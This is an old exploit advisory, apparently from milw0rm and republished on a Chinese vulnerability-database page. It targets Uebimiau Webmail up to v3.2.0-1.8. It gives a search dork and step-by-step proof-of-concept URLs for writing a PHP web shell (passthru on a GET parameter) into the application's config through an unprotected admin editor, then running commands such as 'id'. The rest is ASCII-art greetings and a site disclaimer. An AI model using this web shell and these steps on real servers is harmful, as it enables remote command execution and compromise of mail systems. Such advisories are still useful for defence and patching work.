Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities Dork : Uebimiau Webmail v3.2.0-1.8 POC : /uebimiau/admin/editor.php?load=config And You Can Write Any Code As <?php passthru($_GET[cmd]); ?> After That Click {Write To File} Go /uebimiau/index.php?cmd=id See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png Thanx To .___________..______ ____ ____ ___ _______ | || _ \ \ \ / / / \ / _____| `---| |----`| |_) | \ \/ / / ^ \ | | __ | | | / \_ _/ / /_\ \ | | |_ | | | | |\ \----. | | / _____ \ | |__| | |__| | _| `._____| |__| /__/ \__\ \______| ___ ______ ___ _______ _______ .___ ___. ____ ____ / \ / | / \ | \ | ____|| \/ | \ \ / / / ^ \ | ,----' / ^ \ | .--. || |__ | \ / | \ \/ / / /_\ \ | | / /_\ \ | | | || __| | |\/| | \_ _/ / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__| # milw0rm.com [2009-06-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论